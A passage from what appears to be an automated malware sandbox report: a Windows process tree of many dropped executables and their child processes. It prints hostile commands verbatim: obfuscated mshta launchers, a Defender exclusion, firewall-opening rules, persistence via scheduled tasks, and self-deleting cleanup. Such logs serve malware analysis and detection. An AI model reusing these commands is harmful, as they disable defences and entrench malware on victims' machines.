                                                                                                              • Checks computer location settings
                                                                                                              PID:4300
                                                                                                      • C:\Users\Admin\Pictures\Adobe Films\golKkHPMRW3Q_JB4iNFdwb_c.exe
                                                                                                        "C:\Users\Admin\Pictures\Adobe Films\golKkHPMRW3Q_JB4iNFdwb_c.exe"
                                                                                                        4⤵
                                                                                                        • Executes dropped EXE
                                                                                                        PID:5604
                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                          cmd.exe /c taskkill /f /im chrome.exe
                                                                                                          5⤵
                                                                                                            PID:5820
                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                              taskkill /f /im chrome.exe
                                                                                                              6⤵
                                                                                                              • Kills process with taskkill
                                                                                                              PID:4580
                                                                                                        • C:\Users\Admin\Pictures\Adobe Films\1SLtrBIF_YVzstSxG5xBK_5n.exe
                                                                                                          "C:\Users\Admin\Pictures\Adobe Films\1SLtrBIF_YVzstSxG5xBK_5n.exe"
                                                                                                          4⤵
                                                                                                          • Executes dropped EXE
                                                                                                          PID:5596
                                                                                                        • C:\Users\Admin\Pictures\Adobe Films\fYG4VQJXFi76wMdm0ThP33Ou.exe
                                                                                                          "C:\Users\Admin\Pictures\Adobe Films\fYG4VQJXFi76wMdm0ThP33Ou.exe" /mixtwo
                                                                                                          4⤵
                                                                                                          • Executes dropped EXE
                                                                                                          PID:5580
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5580 -s 652
                                                                                                            5⤵
                                                                                                            • Program crash
                                                                                                            PID:3500
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5580 -s 668
                                                                                                            5⤵
                                                                                                            • Program crash
                                                                                                            PID:2896
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5580 -s 780
                                                                                                            5⤵
                                                                                                            • Program crash
                                                                                                            PID:6856
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5580 -s 668
                                                                                                            5⤵
                                                                                                            • Program crash
                                                                                                            PID:4672
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5580 -s 884
                                                                                                            5⤵
                                                                                                            • Program crash
                                                                                                            PID:4164
                                                                                                        • C:\Users\Admin\Pictures\Adobe Films\dze_8I9p2GpGTRN40VloMlPM.exe
                                                                                                          "C:\Users\Admin\Pictures\Adobe Films\dze_8I9p2GpGTRN40VloMlPM.exe"
                                                                                                          4⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • Checks SCSI registry key(s)
                                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                                          PID:5568
                                                                                                        • C:\Users\Admin\Pictures\Adobe Films\HVn2dq9HKIQJ3ovOicwAZo1q.exe
                                                                                                          "C:\Users\Admin\Pictures\Adobe Films\HVn2dq9HKIQJ3ovOicwAZo1q.exe"
                                                                                                          4⤵
                                                                                                          • Executes dropped EXE
                                                                                                          PID:5560
                                                                                                          • C:\Windows\SysWOW64\mshta.exe
                                                                                                            "C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\Pictures\Adobe Films\HVn2dq9HKIQJ3ovOicwAZo1q.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If """" == """" for %M in ( ""C:\Users\Admin\Pictures\Adobe Films\HVn2dq9HKIQJ3ovOicwAZo1q.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )
                                                                                                            5⤵
                                                                                                              PID:5612
                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                "C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\Pictures\Adobe Films\HVn2dq9HKIQJ3ovOicwAZo1q.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "" == "" for %M in ( "C:\Users\Admin\Pictures\Adobe Films\HVn2dq9HKIQJ3ovOicwAZo1q.exe" ) do taskkill -f -iM "%~NxM"
                                                                                                                6⤵
                                                                                                                  PID:5892
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe
                                                                                                                    ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi
                                                                                                                    7⤵
                                                                                                                      PID:6672
                                                                                                                      • C:\Windows\SysWOW64\mshta.exe
                                                                                                                        "C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in ( ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )
                                                                                                                        8⤵
                                                                                                                          PID:5608
                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                            "C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "/PLQtzfgO0m8dRv4iYALOqi " == "" for %M in ( "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"
                                                                                                                            9⤵
                                                                                                                              PID:6836
                                                                                                                          • C:\Windows\SysWOW64\mshta.exe
                                                                                                                            "C:\Windows\System32\mshta.exe" VbScRIpt: CLosE ( cReAteobjEcT ( "wscRiPt.SheLl" ). RUn ( "C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE ) )
                                                                                                                            8⤵
                                                                                                                              PID:7164
                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                "C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC
                                                                                                                                9⤵
                                                                                                                                  PID:1068
                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                    C:\Windows\system32\cmd.exe /S /D /c" EcHo "
                                                                                                                                    10⤵
                                                                                                                                      PID:7040
                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                      C:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"
                                                                                                                                      10⤵
                                                                                                                                        PID:2788
                                                                                                                                      • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                        msiexec -Y ..\lXQ2g.WC
                                                                                                                                        10⤵
                                                                                                                                          PID:4208
                                                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                    taskkill -f -iM "HVn2dq9HKIQJ3ovOicwAZo1q.exe"
                                                                                                                                    7⤵
                                                                                                                                    • Kills process with taskkill
                                                                                                                                    PID:1344
                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                            schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
                                                                                                                            3⤵
                                                                                                                            • Creates scheduled task(s)
                                                                                                                            PID:3500
                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                            schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
                                                                                                                            3⤵
                                                                                                                            • Creates scheduled task(s)
                                                                                                                            PID:2576
                                                                                                                        • C:\Users\Admin\Pictures\Adobe Films\1Cw2RWZgCeksAJfNkW74FBS3.exe
                                                                                                                          "C:\Users\Admin\Pictures\Adobe Films\1Cw2RWZgCeksAJfNkW74FBS3.exe"
                                                                                                                          2⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Loads dropped DLL
                                                                                                                          • Checks processor information in registry
                                                                                                                          PID:3560
                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                            "C:\Windows\System32\cmd.exe" /c taskkill /im 1Cw2RWZgCeksAJfNkW74FBS3.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\1Cw2RWZgCeksAJfNkW74FBS3.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                            3⤵
                                                                                                                              PID:420
                                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                taskkill /im 1Cw2RWZgCeksAJfNkW74FBS3.exe /f
                                                                                                                                4⤵
                                                                                                                                • Kills process with taskkill
                                                                                                                                PID:5788
                                                                                                                              • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                timeout /t 6
                                                                                                                                4⤵
                                                                                                                                • Delays execution with timeout.exe
                                                                                                                                PID:6628
                                                                                                                          • C:\Users\Admin\Pictures\Adobe Films\XdgAI8UMy1IeoOkxAx4QYfgz.exe
                                                                                                                            "C:\Users\Admin\Pictures\Adobe Films\XdgAI8UMy1IeoOkxAx4QYfgz.exe"
                                                                                                                            2⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                            PID:1724
                                                                                                                            • C:\Users\Admin\Pictures\Adobe Films\XdgAI8UMy1IeoOkxAx4QYfgz.exe
                                                                                                                              "C:\Users\Admin\Pictures\Adobe Films\XdgAI8UMy1IeoOkxAx4QYfgz.exe"
                                                                                                                              3⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              PID:4548
                                                                                                                          • C:\Users\Admin\Pictures\Adobe Films\aP0n3MTwNbS0Ndnb5V6lSQfu.exe
                                                                                                                            "C:\Users\Admin\Pictures\Adobe Films\aP0n3MTwNbS0Ndnb5V6lSQfu.exe"
                                                                                                                            2⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                            • Suspicious use of WriteProcessMemory
                                                                                                                            PID:2492
                                                                                                                            • C:\Users\Admin\Pictures\Adobe Films\aP0n3MTwNbS0Ndnb5V6lSQfu.exe
                                                                                                                              "C:\Users\Admin\Pictures\Adobe Films\aP0n3MTwNbS0Ndnb5V6lSQfu.exe"
                                                                                                                              3⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              • Checks SCSI registry key(s)
                                                                                                                              • Suspicious behavior: MapViewOfSection
                                                                                                                              PID:3740
                                                                                                                          • C:\Users\Admin\Pictures\Adobe Films\q8kEkKNHZls1IpjMtmoTent7.exe
                                                                                                                            "C:\Users\Admin\Pictures\Adobe Films\q8kEkKNHZls1IpjMtmoTent7.exe"
                                                                                                                            2⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            PID:1644
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\build.exe
                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\build.exe"
                                                                                                                              3⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              • Loads dropped DLL
                                                                                                                              • Checks processor information in registry
                                                                                                                              PID:4792
                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                "C:\Windows\System32\cmd.exe" /c taskkill /im build.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\build.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                4⤵
                                                                                                                                  PID:3324
                                                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                    taskkill /im build.exe /f
                                                                                                                                    5⤵
                                                                                                                                    • Kills process with taskkill
                                                                                                                                    PID:4484
                                                                                                                                  • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                    timeout /t 6
                                                                                                                                    5⤵
                                                                                                                                    • Delays execution with timeout.exe
                                                                                                                                    PID:6656
                                                                                                                            • C:\Users\Admin\Pictures\Adobe Films\6g5u76VhBaC71_l9wjQUaL4Y.exe
                                                                                                                              "C:\Users\Admin\Pictures\Adobe Films\6g5u76VhBaC71_l9wjQUaL4Y.exe"
                                                                                                                              2⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              PID:408
                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 408 -s 656
                                                                                                                                3⤵
                                                                                                                                • Program crash
                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                PID:4104
                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 408 -s 672
                                                                                                                                3⤵
                                                                                                                                • Program crash
                                                                                                                                PID:5280
                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 408 -s 728
                                                                                                                                3⤵
                                                                                                                                • Program crash
                                                                                                                                PID:5312
                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 408 -s 668
                                                                                                                                3⤵
                                                                                                                                • Program crash
                                                                                                                                PID:3772
                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 408 -s 1104
                                                                                                                                3⤵
                                                                                                                                • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                • Program crash
                                                                                                                                PID:6188
                                                                                                                            • C:\Users\Admin\Pictures\Adobe Films\vM0jXq7nPTukBm_GSXcOxOM9.exe
                                                                                                                              "C:\Users\Admin\Pictures\Adobe Films\vM0jXq7nPTukBm_GSXcOxOM9.exe"
                                                                                                                              2⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              PID:516
                                                                                                                              • C:\Program Files (x86)\Company\NewProduct\cutm3.exe
                                                                                                                                "C:\Program Files (x86)\Company\NewProduct\cutm3.exe"
                                                                                                                                3⤵
                                                                                                                                • Executes dropped EXE
                                                                                                                                PID:4404
                                                                                                                              • C:\Program Files (x86)\Company\NewProduct\DownFlSetup999.exe
                                                                                                                                "C:\Program Files (x86)\Company\NewProduct\DownFlSetup999.exe"
                                                                                                                                3⤵
                                                                                                                                • Executes dropped EXE
                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                PID:4648
                                                                                                                              • C:\Program Files (x86)\Company\NewProduct\inst3.exe
                                                                                                                                "C:\Program Files (x86)\Company\NewProduct\inst3.exe"
                                                                                                                                3⤵
                                                                                                                                • Executes dropped EXE
                                                                                                                                PID:4780
                                                                                                                            • C:\Users\Admin\Pictures\Adobe Films\HR8tGOjOdsC6Zxfufl0ofhsi.exe
                                                                                                                              "C:\Users\Admin\Pictures\Adobe Films\HR8tGOjOdsC6Zxfufl0ofhsi.exe"
                                                                                                                              2⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              • Checks BIOS information in registry
                                                                                                                              • Checks whether UAC is enabled
                                                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                              PID:1600
                                                                                                                            • C:\Users\Admin\Pictures\Adobe Films\PNE4a070rpLpcKoZt7B1H6Mo.exe
                                                                                                                              "C:\Users\Admin\Pictures\Adobe Films\PNE4a070rpLpcKoZt7B1H6Mo.exe"
                                                                                                                              2⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              • Checks BIOS information in registry
                                                                                                                              • Checks whether UAC is enabled
                                                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                              PID:1728
                                                                                                                            • C:\Users\Admin\Pictures\Adobe Films\QwAwp_r3E4RpnOVdGZnJeP7D.exe
                                                                                                                              "C:\Users\Admin\Pictures\Adobe Films\QwAwp_r3E4RpnOVdGZnJeP7D.exe"
                                                                                                                              2⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                              PID:1436
                                                                                                                              • C:\Users\Admin\Pictures\Adobe Films\QwAwp_r3E4RpnOVdGZnJeP7D.exe
                                                                                                                                "C:\Users\Admin\Pictures\Adobe Films\QwAwp_r3E4RpnOVdGZnJeP7D.exe"
                                                                                                                                3⤵
                                                                                                                                  PID:5852
                                                                                                                              • C:\Users\Admin\Pictures\Adobe Films\CAql_sVGNjkOqJJpctv4rrro.exe
                                                                                                                                "C:\Users\Admin\Pictures\Adobe Films\CAql_sVGNjkOqJJpctv4rrro.exe"
                                                                                                                                2⤵
                                                                                                                                • Executes dropped EXE
                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                                                PID:1348
                                                                                                                                • C:\Users\Admin\Pictures\Adobe Films\CAql_sVGNjkOqJJpctv4rrro.exe
                                                                                                                                  "C:\Users\Admin\Pictures\Adobe Films\CAql_sVGNjkOqJJpctv4rrro.exe"
                                                                                                                                  3⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  PID:3520
                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 3520 -s 948
                                                                                                                                    4⤵
                                                                                                                                    • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                    • Program crash
                                                                                                                                    PID:5000
                                                                                                                              • C:\Users\Admin\Pictures\Adobe Films\OjbS_IOV8PKOz6TZLgbhwcU_.exe
                                                                                                                                "C:\Users\Admin\Pictures\Adobe Films\OjbS_IOV8PKOz6TZLgbhwcU_.exe"
                                                                                                                                2⤵
                                                                                                                                • Executes dropped EXE
                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                PID:3444
                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                  cmd.exe /c taskkill /f /im chrome.exe
                                                                                                                                  3⤵
                                                                                                                                    PID:1064
                                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                      taskkill /f /im chrome.exe
                                                                                                                                      4⤵
                                                                                                                                      • Kills process with taskkill
                                                                                                                                      PID:5496
                                                                                                                                • C:\Users\Admin\Pictures\Adobe Films\AN42hNLL8Zjr19VKJD6oB4JU.exe
                                                                                                                                  "C:\Users\Admin\Pictures\Adobe Films\AN42hNLL8Zjr19VKJD6oB4JU.exe"
                                                                                                                                  2⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  PID:1820
                                                                                                                                • C:\Users\Admin\Pictures\Adobe Films\PxfVdfqZqw0HQm4608raK98a.exe
                                                                                                                                  "C:\Users\Admin\Pictures\Adobe Films\PxfVdfqZqw0HQm4608raK98a.exe"
                                                                                                                                  2⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  • Checks whether UAC is enabled
                                                                                                                                  PID:4032
                                                                                                                                • C:\Users\Admin\Pictures\Adobe Films\CmQFMQCMK_OsSfPw4s5b8SUI.exe
                                                                                                                                  "C:\Users\Admin\Pictures\Adobe Films\CmQFMQCMK_OsSfPw4s5b8SUI.exe"
                                                                                                                                  2⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  • Checks BIOS information in registry
                                                                                                                                  • Checks whether UAC is enabled
                                                                                                                                  • Drops file in Windows directory
                                                                                                                                  PID:1148
                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\
                                                                                                                                    3⤵
                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                    PID:4820
                                                                                                                                  • C:\Windows\System32\netsh.exe
                                                                                                                                    "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes
                                                                                                                                    3⤵
                                                                                                                                      PID:4364
                                                                                                                                    • C:\Windows\System32\netsh.exe
                                                                                                                                      "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes
                                                                                                                                      3⤵
                                                                                                                                        PID:5012
                                                                                                                                      • C:\Windows\SYSTEM32\schtasks.exe
                                                                                                                                        schtasks /create /sc minute /ED "11/02/2024" /mo 7 /tn "Timer" /tr c:\windows\system\svchost.exe /ru SYSTEM
                                                                                                                                        3⤵
                                                                                                                                        • Creates scheduled task(s)
                                                                                                                                        PID:944
                                                                                                                                      • C:\Windows\System\svchost.exe
                                                                                                                                        "C:\Windows\System\svchost.exe" formal
                                                                                                                                        3⤵
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        • Checks BIOS information in registry
                                                                                                                                        • Checks whether UAC is enabled
                                                                                                                                        • Drops file in Windows directory
                                                                                                                                        PID:5160
                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\
                                                                                                                                          4⤵
                                                                                                                                            PID:3948
                                                                                                                                          • C:\Windows\System32\netsh.exe
                                                                                                                                            "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes
                                                                                                                                            4⤵
                                                                                                                                              PID:4496
                                                                                                                                            • C:\Windows\System32\netsh.exe
                                                                                                                                              "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes
                                                                                                                                              4⤵
                                                                                                                                                PID:3256
                                                                                                                                          • C:\Users\Admin\Pictures\Adobe Films\pT5K1D4CWbkpGhqEYLUuT0LK.exe
                                                                                                                                            "C:\Users\Admin\Pictures\Adobe Films\pT5K1D4CWbkpGhqEYLUuT0LK.exe"
                                                                                                                                            2⤵
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            • Checks BIOS information in registry
                                                                                                                                            • Checks whether UAC is enabled
                                                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                            PID:2244
                                                                                                                                          • C:\Users\Admin\Pictures\Adobe Films\Ieccwp3w_WzEoqm2tY16AELc.exe
                                                                                                                                            "C:\Users\Admin\Pictures\Adobe Films\Ieccwp3w_WzEoqm2tY16AELc.exe"
                                                                                                                                            2⤵
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                                            PID:600
                                                                                                                                            • C:\Users\Admin\Pictures\Adobe Films\Ieccwp3w_WzEoqm2tY16AELc.exe
                                                                                                                                              "C:\Users\Admin\Pictures\Adobe Films\Ieccwp3w_WzEoqm2tY16AELc.exe"
                                                                                                                                              3⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              PID:4908
                                                                                                                                            • C:\Users\Admin\Pictures\Adobe Films\Ieccwp3w_WzEoqm2tY16AELc.exe
                                                                                                                                              "C:\Users\Admin\Pictures\Adobe Films\Ieccwp3w_WzEoqm2tY16AELc.exe"
                                                                                                                                              3⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              PID:2240
                                                                                                                                            • C:\Users\Admin\Pictures\Adobe Films\Ieccwp3w_WzEoqm2tY16AELc.exe
                                                                                                                                              "C:\Users\Admin\Pictures\Adobe Films\Ieccwp3w_WzEoqm2tY16AELc.exe"
                                                                                                                                              3⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              PID:1092
                                                                                                                                          • C:\Users\Admin\Pictures\Adobe Films\9eCvXsdltzwn1W0RwpacgsnW.exe
                                                                                                                                            "C:\Users\Admin\Pictures\Adobe Films\9eCvXsdltzwn1W0RwpacgsnW.exe"
                                                                                                                                            2⤵
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                            PID:4312
                                                                                                                                            • C:\Users\Admin\AppData\Roaming\6174388.exe
                                                                                                                                              "C:\Users\Admin\AppData\Roaming\6174388.exe"
                                                                                                                                              3⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              PID:4848
                                                                                                                                            • C:\Users\Admin\AppData\Roaming\7714060.exe
                                                                                                                                              "C:\Users\Admin\AppData\Roaming\7714060.exe"
                                                                                                                                              3⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              PID:3956
                                                                                                                                            • C:\Users\Admin\AppData\Roaming\5184731.exe
                                                                                                                                              "C:\Users\Admin\AppData\Roaming\5184731.exe"
                                                                                                                                              3⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              • Checks BIOS information in registry
                                                                                                                                              • Checks whether UAC is enabled
                                                                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                              PID:1952
                                                                                                                                            • C:\Users\Admin\AppData\Roaming\8950344.exe
                                                                                                                                              "C:\Users\Admin\AppData\Roaming\8950344.exe"
                                                                                                                                              3⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              • Checks BIOS information in registry
                                                                                                                                              • Checks whether UAC is enabled
                                                                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                              PID:5380
                                                                                                                                            • C:\Users\Admin\AppData\Roaming\4224759.exe
                                                                                                                                              "C:\Users\Admin\AppData\Roaming\4224759.exe"
                                                                                                                                              3⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              • Adds Run key to start application
                                                                                                                                              PID:5668
                                                                                                                                              • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                                                                                                                                                "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                                                                                                                                                4⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                PID:3168
                                                                                                                                            • C:\Users\Admin\AppData\Roaming\2670677.exe
                                                                                                                                              "C:\Users\Admin\AppData\Roaming\2670677.exe"
                                                                                                                                              3⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              PID:5908
                                                                                                                                          • C:\Users\Admin\Pictures\Adobe Films\EbSWQvWPZhH3FId3YyLiCWdY.exe
                                                                                                                                            "C:\Users\Admin\Pictures\Adobe Films\EbSWQvWPZhH3FId3YyLiCWdY.exe"
                                                                                                                                            2⤵
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            PID:4368
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                                                                                                                                              3⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              PID:5656
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\BCleanSoft86.exe
                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\BCleanSoft86.exe"
                                                                                                                                                4⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                PID:3600
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\Soft1WW02.exe
                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\Soft1WW02.exe"
                                                                                                                                                4⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                • Checks processor information in registry
                                                                                                                                                PID:1844
                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                  "C:\Windows\System32\cmd.exe" /c taskkill /im Soft1WW02.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\Soft1WW02.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                  5⤵
                                                                                                                                                    PID:6264
                                                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                      taskkill /im Soft1WW02.exe /f
                                                                                                                                                      6⤵
                                                                                                                                                      • Kills process with taskkill
                                                                                                                                                      PID:4164
                                                                                                                                                    • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                      timeout /t 6
                                                                                                                                                      6⤵
                                                                                                                                                      • Delays execution with timeout.exe
                                                                                                                                                      PID:5840
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\setup.exe
                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\setup.exe"
                                                                                                                                                  4⤵
                                                                                                                                                    PID:6620
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-36CLC.tmp\setup.tmp
                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-36CLC.tmp\setup.tmp" /SL5="$103CC,1570064,56832,C:\Users\Admin\AppData\Local\Temp\setup.exe"
                                                                                                                                                      5⤵
                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                      PID:7024
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\setup.exe
                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\setup.exe" /SILENT
                                                                                                                                                        6⤵
                                                                                                                                                          PID:6328
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-6EL87.tmp\setup.tmp
